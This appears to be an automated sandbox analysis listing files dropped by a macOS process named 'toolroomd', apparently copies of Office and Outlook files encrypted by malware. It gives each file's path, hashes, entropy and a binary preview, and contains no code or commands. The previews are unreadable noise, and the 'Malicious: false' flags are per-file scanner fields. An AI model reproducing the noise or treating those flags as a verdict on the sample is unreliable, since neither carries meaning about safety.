SHA1:	0FEE11125EA965E38EF0FF4100009646BAEB469B
SHA-256:	E1ED88E553380D23DFEEE90FFE334D7ECDF1D466EC3DA1F73D25F3A581794FAE
SHA-512:	EF8B3AA9B27371BFA26CCE6AFFCAC00E160D54739C05D47B50B9DD36A21CF36A5138E40C86CE0C9BAFC2168BDF7E9B796FEA1DBCE18DB9BAD6D46092C59FC3C6
Malicious:	false
Preview:	Ci.^.!.2.o.a.n.7..8(.t..........9.^."1cg....j....@.4..h.]..%NoV.V9....}.,.!....d.......".Y.Yd.e.~...b..b....Q.....4..j..7..-.I....7[0w.~D9p}Ar.[.....P.....8.s.....]......#H....U..?.8.........h\..w..$.0.w{.$..P.....D...U...^>.U'....Eml.."..q{..WE.....^lX....>.5j.~.(..0 ..}.zK..N=XJ..$YA ..a{_....\|#......P..wy.1.......~.w..:.>...?.!..7q,.L...r..}.^.....'[.k.3.;.h>......$YA ..MV.\..%.l_..A$....1hM.>..9i.@(.....3@.....Sc.U..?.8....{l<..J..^60ue...C.e.W..3.;..,Ta.}./.x...Ox...I.^.d....=...u. o....u..PP.E+cA...1.....#.Qe.v..4`Nr.......w.._._..}0.U....#.1q..\|......t..Dn.;$.....+=2...1......5j.~.(.^.s1.k..\|qeJ8T..^.f+.P...Y....0bE@..}C..H.O.....r..)....Y)..m...%!.>..XK......&....D.H\|_..a..]}?\|...F..E.9B..s.Q(..W.5.........,.E7.'dyD...d..b....(...l....U.vy...bE......K{G.=z.M...3G.."........o-..n.d.r].^@...........T..b.:x..T....N>..7.l.o..dW.#.....s..I.Y..Hi.,.........u+.N.}...gi.....F.].....k.j...8.....+...3<.D].W.+ .0...\xX..I.3..4.vr.L

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.F152A803-0CCC-4AE8-BCEF-45F08E03AB6F.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	16538
Entropy (8bit):	7.90573457578905
Encrypted:	false
SSDEEP:	384:gHL3Az+YuOxNEjuBlO+lP7klVZUU90FjM1G9kp:gH0sj8rljkxUY0FjMAWp
MD5:	06E1E5739452A107B0E86331FA853636
SHA1:	3DA8A8FA6DD9A54FA088BF43CF785E445FA17A2A
SHA-256:	DD6CD8CB792A6BA98C5C237A53901B9908CED08F99680456D64DB588F47DA189
SHA-512:	20995FEBCCF6B55880BD0D1D3015234C562EA96708844D3CEBE13C3D7A7865DBA93AF07D1F86342CC20B21FFE30D91656988F5A12FAD700AC0586A75FDF83739
Malicious:	false
Preview:	.:..>oi...R....,..R....,..R....,..R....,..R....,LeA.{..0...........C...N.z\.b....R....,..R....,..R....,..R....,..R....,.\|..3...YS<2.`.J-G..!..~b}.%~V:.<...`..P.Ul.tw.....A.b..:$....I../.#.......R.G.u.m.)......H.{B...."Fg'.U..=.Ro2n\|.;\.]..0/...1....>R}.._..T...p.R..).z.2..<."..l...^o...,v.....5(..w..Ao.&..B....g....n0.......9.1..$.....Ud.C^..k......c9.....[..r.u..j.)...\|.Y..6.g....{.Z..O.cl.+o..A...DJ.........;k>~n.j....._.P.E..r.....8..p..wmKY.p.....M..WC.\|..F.B.DE. ..1.r.f........=S%..(U..(u.bG..yp.@....s....k.=...k.....wb.}_..L.w..2,..Q....SD^...XZ..T...D.....l...'.Q7.tK1.`'..^..WU-..S_...._...;[.}..d....f.q:..A\|.2..l....t9..=.......XE.g...u.q....Vp:.vC..L..z.8Y.?^P^i\|.5dY.g..k2....2.......\......r.....&..P. I.F!.v.h.s....V.+8.U...[6P!...8Z.../.li..._(W.G..R....,..R....,..R....,..R....,E.Qh5.sn......%=..i"..5.[....u.isI.r....R....,..R....,..R....,..R....,.8..wS.....5... V...X.....wr.H.~............?....cN.c.N..g..I.......'....q.+.b.$.z7.e

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.ctrlstrcaches/.com.microsoft.Excel.ctrlstrcache.en.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	22939
Entropy (8bit):	7.977124999350688
Encrypted:	false
SSDEEP:	384:L3tpUJdbjmY4ppoDCvoWOxAHj2y7lqbVxTJ2y7FAgZj9i:L3tpEj2pnvokSiuxTJxygZj9i
MD5:	8AFCDB926C40DC58F8E729197161986A
SHA1:	DDC0FC62AF7A850B342036267CE0457B37BF75E1
SHA-256:	4B92AF27D8D8DF52279E478B9D34D9A8EBDF8941FF0DC7ECA759A4E9EC95D549
SHA-512:	DD8FF9A5A67189B2388E88B50B3468D92E63D05A20ABCB81BC7236CD0496D6EBB7E0C8225F8CDC068E19698D20D659524AF5FBB2CDB0825F9A89B00C4AC95164
Malicious:	false
Preview:	...a>k..O+.....(.M.b...i.!..%.#.hMAj......@U..W.!$.5...Z....F..?...wq0.5....S.pP@.3..286.0..=...~<l..L.....!.Hp.[.Ee.......v..(K.ZvK.Hr$...xr...0.Q...^.-..{EwW.6..H+..g..=....M..X+2 X..D.....,.Ohp7.M.d.+O...UC......&.\.z......Q.s...]......C..9`.O..O.m.p....b"..T.Ey...2...MlJ.\|...W...f...h.J.l....p.V>..5C..Jz..U.}K;b..w^X\|..vH..RU....(...........,.k%...dJRhpZ....uh.+a",&>....5=./)....J.0..n_6......p....}.......^Xb.T..m...G..g..;on;..T\|.^.....r.7.0.........c..}.b...u.!...J..X[.Q.?..)s4..g..p..U.M.K!..u...K..fr.....<.d.w/..Cmg:......t...g$.CfV.U..y.X..2...=v4/.Ir{%...~?.^.+p...\|W=..\..........1...L..&..&.>.\..K.......\|Z.^....&i9.#..dK.:R..6<_.._pb..0.......r.s..8V.o.ql..........(..o..T.....B....r......g...R..H..Z.^......,..0.g........5.N.!.0Z..k....B....Q._....(.J.Z65...H?xY......[A...H...S33Hx.c.#.d7o..P.`.)...e.V..ze.e....1H...M%..o...9p.'..l.tR.?.....h....m8....D.5_....p....y...?..*z.z.'.V...a.HL....... L).v.H...Cb.w'd....f..^5...=..<

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Preferences/.com.microsoft.Excel.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1298
Entropy (8bit):	7.4093191460016605
Encrypted:	false
SSDEEP:	24:UFwu+d/iFKsNA5u3tbqH47GrTg0P8r8TjwA2iv8A6Q21sePc0m7:i+XLetbW1TJ8r8TjfDUf1Npq
MD5:	A6A573E6F47685DBD7ADB1D5103EC7A5
SHA1:	1B173EF682279034549B77705688907593238954
SHA-256:	D622B79668EC7AF23FA9F6AC543A3AF724C034A4342DA4319C79C14760D6F00A
SHA-512:	A41BBD51CB83B2219EE9D75438D148FE75B87EB471FFC4B7B438D26EB299AE5B2F59E2901CE84F694D0B098BFC05922ABD212FF2EB39823CE263B07589321950
Malicious:	false
Preview:	...a>k.....V..M..G..F.sk.`dQ.G.@.C.$z..u...B......q...'...t.....>.h.......7e)..l...:z..V. .G.Wn>..Lo.lbQ.......\|.27..D..!.E......3#..i>.4.e..c..)...,0.7.....c4.. ...]..,....../.@p..1..3&W..5.....9j..\8i.d../m..2pg.f.{.8.._.r0.58....m:.].......l....:..kI~..FR.\.o...X.....:.p3;c.+m....xV`..2....T..x....~S.#...r...J..OBq ..O..M...=."....i...xO^.....=-V..\Aw.?....`6slu6.M2R..(..a...mm.....F{.../......!.I....K..J.g z.v0?v..[/W.....y..a]2.....E.....K.....0..f.9...la...]B.z4l....'.O....QyD...\|BB...H...J.\..&..k....MA.H..V..!........4.6.b...q>....O.4-({.[....{...2.+IDp2..{...o7..(;..5.f`.0...w....m...L.s.....s.^..Uk:..@.......0.L.[.M.y.d.p7P[0.r....)..~....1...qM..../...VJA/........j..u3..\.E......f..`.F..,..g.o.,......I.....2.0d.tPF2..30w......>].TF:.>V.z..^..^h.^..d..3..k'.....d...gE?ff%.:.X.T..!S..d.t.......n.r..<./.&[..XN............7G.(.q.G..V3... .V..b....m,<...{>.M..{.......3<-.Gq.p.\...}`svc..-..#....%...dL........GG...6<.."a.......l.........

/Users/berri/Library/Containers/com.microsoft.Office365ServiceV2/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	32435
Entropy (8bit):	7.966400446204206
Encrypted:	false
SSDEEP:	384:fTrmRktE45Vz0DUbobZqclw0jhrc1F/xS5FABZJ2BN1BwVX1LcLMcqnQ5hxGZIrs:72sE455hGAFJSrABZJ2rKncLYZss
MD5:	6D820BC4E5944C6A523CA6E013E2EBAE
SHA1:	92EB22D745D700AAB1CAE22ABDF38F302924A8CD
SHA-256:	1C8A2F2142140310AEBC478E925B326538D45CDDBCFD0817E396F8D5513CB8AC
SHA-512:	5C595DCD3DB8BD3FF476BB9116C536808A1C8E6CD36F2EF8B4B150247F244159A73B18F10860ED706866DF3936316DF70D25781A2481F2E2EFC4392141DC625B
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}&z..:\|\f.~.^.....V.01.F.<........6..U.......O....l..jQQt....e~Vp.....0..`...R:dwZH.}...M.~..Uu..9h..3..p.=......5..y.,..D<EwK4. ..jI.[A.....,.qb..N...c.<......1.P..\.?]..SS.~Ea0...ol.D..x~..2.......p.....A.f.....U.'......'=.#B........e..~...s71.P..\.?1.P..\.?.....~..Uu..9.e...n. .U.lX5..5..b{Wp.....8.Z b....\|.....q.Rz:o...V..T..Pb...}..G~.]..J ..x.......b,S..$..7.2j...\O......c4?....v!....<.YsJ....[k...b.q\.]C.].].I..Y....J..%..p.[.0.Kz8w.......B..r.u...B.0.X.U.,+]......6...j.t`2yL.vhm.....w<k...S..I9.....C.......1 .}H..Y.C.T...A.6..@....E.4N..GD.M.......$.-..#z/kk....w#r<N.Gf...#K.o.K....(P.Lw.D..:W2&.$./#z/kk...>.?.@cmw..(.e.(..@....Q..G........l.?.% A1{.......v].o1S...0.S....q...X7Q.S....."0U.-.O...-4.d6....T...9v&....p.>.(..+.dR"},.(..8.s...7.X3.pNN..@..Un....R.<&.Y$O.9./>B.....y.-.J..d.W.@#.'....tRm...Ad..JJ..f...k.'.S,..A...."o...y3.#!.<.2...q.4

/Users/berri/Library/Containers/com.microsoft.Office365ServiceV2/Data/Library/Caches/Microsoft/uls/com.microsoft.Office365ServiceV2/.ci.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	370
Entropy (8bit):	5.058327690011446
Encrypted:	false
SSDEEP:	6:UquYOD5FN6LNaBzsewLYHEec/LaqG8rQQwiQ/6:UgODp60sewLYTc+qGm7
MD5:	C77F5F4EFEBA96AA0791C0ACF83CA838
SHA1:	4C8F0558C8F90B5B988ACA9EA57023FA5824A200
SHA-256:	DE98AD9F99D8D3677004C83EC339250EF2AEB40041AF3A97131CB21B631C20E8
SHA-512:	2EC3CDF3B94D3B1E3B44DCA8B27A007C66BCA88AF519837358542BE9757AEB993B245A162FFA1C4F3574CD512A607D03672AB412BAD07E28EE0B64BCBFDB9401
Malicious:	false
Preview:	...a>k..\.q.oL..M`..k......Y.O.u....rW..t....Sq6<.."a..O.3.+.W.A.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Office365ServiceV2/Data/Library/Preferences/.com.microsoft.Office365ServiceV2.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	546
Entropy (8bit):	6.154976808937918
Encrypted:	false
SSDEEP:	12:UPPxRMrNUCtnsZ08GR2OBaCsewLYTc+qGm7:UnxRsHtsapICsePc0m7
MD5:	2034D794B8AF18675F7AF4494CA1F3D4
SHA1:	4ACCA941C7384942C92C4042B93C30092AAFF9E3
SHA-256:	AA7A770171EEE23A554382AF54DF97C4BA8717E004A9E1CD3CE77D8161EC01AC
SHA-512:	C443589719016A401830CF58B4DB02A92CA676D28583CA4D0FC2D2F88F8D007930CE9998AFEEFB57A42CDF963B2346B0409E8F4BA7022DDB5272223195FC289D
Malicious:	false
Preview:	...a>k.....1qc./..'H;"x......AM)..)f/.h..j.P.....g...)4.oerq.5._..d.f.s^.&.M..,n....W..>....[4Y.R.^.N).#.k!..0..(....r...\|"...:B.......2K.....`.6..w.....v..f..l.. ..,.0I..B.>....M....K.vik..N.{+D:?.Eo;....E...6<.."a../.........................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	44492
Entropy (8bit):	7.972751525907881
Encrypted:	false
SSDEEP:	768:8r74R0xCMfwCu3okEWdD9ASFitHO9NO88qKkHCbXNi/t0:w3cR3o/WdD9APu9I88DkoA/6
MD5:	853A7A459213F4E66B026A5716E4E7A1
SHA1:	7867255E9AA95C366E92410DB72D34FD5363D754
SHA-256:	5AFEC92D6C45301C9EAEC26BC2E8CB59AC174AAA875FD07388E3EA5E6D4ABBE8
SHA-512:	E67642839280AFA989E427DFC4626CCA77206A9694E1A3ADE9086F0B85A224F8F13F4AC092BD61DD860D990A744FCC489DB146B3AB48A48F4C58313C00FC175F
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}..3t..[....q...B.3e......$..c.yf.Kq..9r.!.....P..\......D......p.6.1.u...S.....gNA.Y<......~S.c....w..B.....'.......m..6N<J0.<.).....F..\|...{.."..i.z...).......F.."I._.Z+....JG..........%UZ.g..!5/S.....c.5Y..7.b....c.......P....Q2xfo.S5.E..`)..kv.["I._.Z+."I._.Z+.U...i.c....w.HS,...o.D.xH1.u0.:.'..Hz..#....M.?....V95....SR).&].......DZ.....T.w.0.&..v......T....I:..4w...\.d .H,O.u.c4?....v.>u..E.....q+y...h..TE...H.8`.H.sI.#S....-f.`...)\.?._....G.THa-..q.I..q./yd.JnD..+Q..Y.)-.5!..$..5.....qu.I....mC.q..Mu.....\|...e+.k..MM_...".t.&}..o...._a6t....Ly........a..$...^..oA.nV.X.P!........>..xW...&,..JO}..&.P(.&.z..4..4#.J.f...>...Ha.i...\|....&,..JO}.7.....Dw......z.sh..c1$.S.s~..W..v..g.}...1...`F....P.-Dl..h.......s2 7A.....f..[..d.1>..e..#.IS^.....x...T...9v&......4..).w........e.qv...=..7.4.R3..j.\|Ib.......&.)<:s<...q....&g...=E.O.......T..[...eL....,tH.#...

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/.whatsNewJSONCache.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	3514
Entropy (8bit):	7.7949327412675204
Encrypted:	false
SSDEEP:	48:yjzQcyH/+hD7I938IsD3vpn+TowUP6udSBmqshpDutOlE1YZ3T3rte4BlNpq:yjvyHGNIXUP1dSBmHhpis6i3rtequ
MD5:	33938C35E148E33414D59BF86A2620C9
SHA1:	38CBE47192F1690F9450BD6FE1D08E328AB577C5
SHA-256:	3EA57561985C462C7E5ADABB275828EB8284767AFDEB857582DFA26D7D329A28
SHA-512:	712FF067B92C71EB6F3AD16386DEB55663A100860FE409B31D141B90168A9A71B864937CC559C3A4971D5591A8968D4D4CA1FE72B16D0EFB28FED7AB13E44C56
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C..K-....u.^.T(3..0...B@.s}.......q...B.Q.'.F..{^....D.y.G...S6..Y=.G.}r.$?}8.0,...O..H.....p..,..Z..S..@.11...T.r.>W..`.....DUGw..d]...1.....~......E......p.1K...k...).~-k.H..u.>.OJ......9{..\:F.a...v...p.(.ual._..$H..s..j..._.{..J.C.5..Vw&....,d.....P]....,.1K~'.G...9..........74n.\"p.n.").g..0........b'>6X............H..R.'.....p.....MK=KF.4..".E..x....u....<..^.1H.....p.........&..3Fs..%.;..5#3.l@..e.U.d.C~P7&....9.H.....p....2..}:(D.wQ..nI.R...{...0....[....-C.......#..~.,..Z..\|.....5..}...QKxKH.......jR.+2.c.eX....N......4.\..l.......H...`N.......,..4.....g.~@.<..........c_...s.NM....9lU..\|.....g..T..\.8.d...F._..m[.:..F.c"E..8S.."Mb.<.ft.....s432..%T.Q..ys_..y..91.1.j......,.z..#..~.d.....^.y.:......d..B.$.......1.+E..76).@........\|3#...].N.?....O....^.F.c..^.R#...W

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontCache/.systemfontmetadata.json.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	430084
Entropy (8bit):	7.982319576552611
Encrypted:	false
SSDEEP:	6144:tBp5r9zvAMq9lElP78ZeeoobFk9//gGDsG/dFfGVkUkTi0uBXjMhczJ:/9/CelPibFk9ndDdMn0uBXoKt
MD5:	E07880E380CAF0176CD3D28C3476792A
SHA1:	F2C32E6672723ED75C5421F320F31F0B37A5C718
SHA-256:	E8827E3FBBF33C95A7C864C125C484D9D47FE651CCB269F7EB846D8ADBD700CD
SHA-512:	8AB46D42A926B33294708E9F76293FC47950D98998FE05EDD91896BDB63F41DF72F015D1F224C7AE7F26C126E6CB0ABB5658803E0A6ED8B6101B054FB3764054
Malicious:	false
Preview:	..f7.J.R...C.\|P.=..nz....>5T.K.p7 .ww..~W..T.x...{..j...%....,.B..ca..:.f..E&.;.l.[N8...~.x.o..?.ci.Z.`..u..y..[q.8..$\|jt..[...l6.........'h.O.8!6....9.:...4uv...%<;.SC"y...\?.,i..4uv.....6o....O.....tZl..){q<z.mF..$\|jt..[...fk]...L.3.(.o.A&T.._.EN..A.t.^..<?R..T..6RM....r.GH........$O.....=;..8....e7....Y4\|.b".h.#..5X;.I...$.#..OP..4...\|KH.J.u@.y...H..#&...mN.=.%N..!.h..9...`Kd._[E......!.....J%?...Z....4R....]...Y..8.0.XM.R......+....p.....>a9?X....../a2.....XK..(......%g..k.'v/].....-j.^.......[U...HB`OI..Dn.%mfj.kk)zv..q......pp..'.P<..Vv.0....<..#B......)<] .\|.&..Z.Q.....B.........l....AVC.....x..[....7.......0R....K.9...L......A....9....K.9..j...=s._..F.;...DrO;..&K.N%hXVz.O......\.......B..g}..K4..>..w.......O...J%M!...!...DrO;..&.O...J%mK7V....mA5..:#u.I,H...9.....wa..O........w~._`........0R..u..7.x.:.O.z^.,9.T..4..Uo.k.W.o....I...[.........k.........Q..k.e3B?....>.G=.....J{...w.*.fZ.UB.`.`.\+...<..#.4m.....uX..(t....T.'......"\|..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Al BayanRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	7.419458765640948
Encrypted:	false
SSDEEP:	24:9AERkLERuy8EEt+kei6nw9GMpc6XIiH0642c91TkczyHSsePc0m7:9reLERY5xGePt0609qczyHSNpq
MD5:	1168BE0DF95D93E9B2B2430CF501FE63
SHA1:	4C4357E28181D1F8CE64555ACE6201CB865A8CDE
SHA-256:	3E8A6002A7923B8B7177D515B4BA18C5DBC37D48A5AE0B1B45B0FC79FA39FF15
SHA-512:	35FF41F7ECA3993ED5F0CC586776954B9D06439A2EB67BF90692F28C428B989DA935137250DD33FA8CC6253AE9AE253A15EC0C2958EE5E8A836D4838336953C1
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.a.o......L..[..l...E.W]?.. .pWx.....)...m........_.v.#LO..9s..{J...:..~(..F.'(.{'x4..v.S.>Iev0",Q....>..D..{.....Yj...._.@..}@$..kx.d;....\|.F...W..M.(@...2..1.i.9.-..}......s.32....]fb.I...7......z)\.......fHa..u.i....D...J.3......r......}...J.d.l...w...'C........UF0.]^.p..z.:..@.+.S.i._..bW.i..O.y4E.q....Y\|.Q:m.U.'&..7..3O..h$.x1i\Z.4l...._...tERe....i]........)..Y.^...I#."..Y..K..[d.<.7...u.h......7......_...3O....W......dnZ\_Y^S#..."{...s\|\|..?.-..=v.6z.P......n.G.O..9 ..xy2..pkE.....).......i7....Nqa:..G."2.B.N....9...}...>...U.<;.2.6B.{.\.@.q....l.]......Q.$...B.&.....dQ..@.p.R(.k.[.....p.C.f:.F.'.+!x........-8w.[....zt.. ....X.hY_.......u..`..\|...~(.\|...Nzai...#..[1..+..-..i...J?V4y'.>..Nh..hm.;....cv$.p.Z......P..z.~..r8-z......Y..d...s.J^.h..t.s.{..?.1.)'...h.l*$(..........o..8.....3.....G".eS.KB_...S.Xi......b.v...2...BQ..@.i.'.GF..M...zp.4....1...S..KG...[......&..o...pY..h..(t....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Al NileRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	7.204770573826123
Encrypted:	false
SSDEEP:	24:ElTfn5KMnImFMFKzjU98vXM9vq+sePc0m7:ElTfUMnIm3jU98Pcv5Npq
MD5:	15A8AFD708F432810BF026C785D7B8BE
SHA1:	9FB76862B7B9084F9C0A66429DFB65AB138332D5
SHA-256:	8C58F95A7B51868D96999216C169293AA4461EC45A49ED607E052890D4A48454
SHA-512:	EC7599C8F2098D23D49D34BE1480F534E52FA91FE792A90613FFE3937D83C7D125DC812E39288FAAE9C16C0A01599F2B826CB6F95A31BF5264AC9635981E2B02
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.S.Y_z{...:(...mQ...]...M.r,..^F...[...x..$.....C4....q.o.[.u.......I.E.cs.!].\|.Ja.3S...D.(c.F._HT.).b.C.,..IW11P...........B.\(......../.d..2i."....:..)ow0.,m..R=r.....6......Vk.GUu.`.-0bH..1..3.h...iU..^...2.=Uo.izPo7.%G.Ns...G.;..N..?..6.BS....t..T..G.~........L..f...l..z..\./<......\|'1;.~L...j..K.q.....z..;..a...h...u..9 B.?b...R..Q.0..f......M>..J.a.....>.`..[..QmL......VV..Rp.@......xU....M...^G.......-7...a..kx.c\|..2.N.V.....[5CS3.../9..eU".\|.tN..Q.u.XM.............>[...H.t{E....-..8.4E5...~...............T.Vsq...2.\|rnUL3O....(....M......!..m.T.$RJZ6....F.D.7...%._....~.CTc6...I6.U.KmH4...R......k.....U......%..M.]a...t.1.....U..u.d.Q.I.P...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Al TarikhRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1146
Entropy (8bit):	7.2768406076314545
Encrypted:	false
SSDEEP:	24:E0/McTUQlV2awIv/oL21YgsmGf8MKcFIPNDY1wcigsePc0m7:E3csIHoiigcfrKcOlDY1wmNpq
MD5:	771A60A36ED3785DE23E69CC6F631D66
SHA1:	5F8FF721A8688365A6F7D4A3B16EE6CC5CC8C10C
SHA-256:	03C6E5945FDE5774D0CF8804456CD317DD4FC5DEDD374720997C30D3D8E01573
SHA-512:	B9BA458005A239E1C36F9F5DAA697EC674767C500EFCFB19733F0BE40EF55977B985C39584B33D6DEA145C98438DA1826F6667D23BD76B49065CA57EB4CDEE39
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.3.}..0.4.l^..j`:^.v.,.!.........4js$..+..a.%.._...].yz..A\......n.w.R?.xX........<...<.djY){/..Cv..0.%..........8s.+..x.b........gI.......^..V.M_.F.i.......#....Fa.O.f..V..W...^.~..`.k...z..bA.l.'2n..+h.....W;W/.X...Gu...\.W...W".....t..t.uM.....lYFs...b....4..;.....W=T9.G%.......zJ..y".....$.PA\P.].F...<^..._..=..}&h[....u..aZ...[.j...)`E..$..."T.q....\.....#<x$Y.Yq..UB....F........ZL.T.\c.&.J..x.......t..U.A...E.y.a].....y...4e..CE. .:....\|......1w..j.ap^...Y....O7M.%.K..`d.1..iu"...t.x...P..<..D...\|...6...1X29.\| [AT....v.O.&..D.y#......"f...].."..../.l.......!N..xT!\F.$U.b..b...oi...sPh.b.P....z4][.5....W.Z1fqZ......S.J...w.....I...t.?NPwM.....B.....c.......l/...S.E:.....];Ffi.G>B......I..e...H......,7.g...i6@..0.$j=%...q.....I.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.American TypewriterRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2434
Entropy (8bit):	7.724496500813692
Encrypted:	false
SSDEEP:	48:EmW2z8v66hWbJnLty7uki/PwAb0WIZQhAK+MA5Pf1ceCUH242Npq:lW2E66hWR07uki/Pwk0W+L9h1vHQu
MD5:	0615295BB567E11BF2222F5C1777FF64
SHA1:	52737424EA149AAB052E326FABF9EC7F9381763E
SHA-256:	C7FAE953D835F28B681A1FB5DE2E97D3C911DC00D83F16FABF41C497B6E5B999
SHA-512:	F5BF1E755E97FD3BC8D9578B23B04621BB2444A36AD6383F2D025B9D6B7CE5F55D6625D56DA400BBDE0531AAED2A1392DD9ECE44727451459DFF410C89CF6DD9
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a@....Ljw.s%..w...^9.0...b...8.N....$.B...tJ..)M....^[.h[.v..?....Y.+.<.X.%...s..,....`......0.I....0.I....0.I....0.I.s..j".H`qc..u...[......#$.c..u...tP..T0\|.<. :...-Us.C.....yIj..Lf..[.ON..^.r.2.m.n......Y.Dg.r...O..,<.....i.......85.l....V.......xt...."..D.j..8.T.....6k.~1A....;...A.....%w..u.. V..%y............G..R......6.\|^...<.#.~2..oM..:..Z./..."y.^qAJ..O...]NO..(....K.o...8.....2...V5..\6...9......j3..I.\|.4....%>...C....}..JY.3.E..]2...!...xP:.Tr..}.9........./D...g?..+y.$q.8N[.c...K.faN...........CW.Kzc1.... M.-.q....z.9.\|.H.q.X...5.W;..l\..L...B..>rd.<VK..@`..#..;vS..........Y..x.V......2.t....T.{b.>.v..Z.;.....E0.F5L..e.F..U....\|...."...%..<.>...........Q!...`L..8....&[.}.<....6..e."U...d{.C.......b...G..>.?".j.....l.i .3.s6.........[.h@..Qi...o>72.....2?.....f.vV.......-..M...9..X.....3...m.XP.'..;..w..@gJ....6.....Q2...4.=.J..M....-V r..7..Dp.....\....,...3z

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Andale MonoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1394
Entropy (8bit):	7.471703919354663
Encrypted:	false
SSDEEP:	24:E7jU6TtPJGm0sVP/7YM2B87cdFcXFZ8w8Aw896x24k56NlsePc0m7:E7YyJGpsdYTQFZv8Aw896x5Npq
MD5:	CE7673244A7030C9AF862A3055FAED34
SHA1:	CA51925E22E777A9BD344A0130F908333D83948C
SHA-256:	F35CFA5D3E978F6CB4D0F1C5FAC9DA3D4C6E75EC4C795F2D9157D57271C2B1A6
SHA-512:	1600AD27468C6007A0D6D12A63384D91EFBD69CFA266814F7E7B642CDBA4CA62BED80F0B212E91943B5E7F8502E18E422ADEB88FA873358DD48BE27BA7FA11A3
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...s....&...3......^A....C....<.[..<...b.i.........M..+.$S......R....aL.+.."...+.........k..f.`...3.Q....eX..K.M......6.f...........Bw...5 ..s..F..4......J.0.....:.....[.b..E.2G.2......P#.3........\q.,.../7....UX...r.....R..fc?.u....J.;.2.nh.}.....Mb:P..B..R..W...&...}..\L....}..I....`...j...+0N{.#..s...#.".Y...Z.Yyi.O4.(..B..d=.A.I..P..../..O:....eW.H/.58........7.\|w...+M.gF.1...o........p.e '...P.7...1.{+.ZE..D&i..:.].......[u..E\..e....X~.8.._.)H=.......#..:%.H.........m.......}e.ww.SWiN.-w3Q,.,..5.F#qR....._.'.%.B...r..:....^S..}...a..(..D.I....{.r....6J....m.j1HI....<.S...3.......g.L..'.+.#]s.Ubjim.....sq&...iY,&...1..(.......#.{....]#.a6=i.81.......A...}..P...GB...]...V...D.x....X.#b{..qxHL.....6. ....."F...6R..D.1W.TK.0.......].9..d..=Vw....\|.)...."I..W...&xQD.(..l#.>>C...T.Y.StV.U.N.g9..nW:5.M'.......eJE.J..]....pJ.y..&.1...x..&........C.Y.<..i.b.k.......f....]...<..5.I.....6.{

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple BrailleRegular.png.e Download File
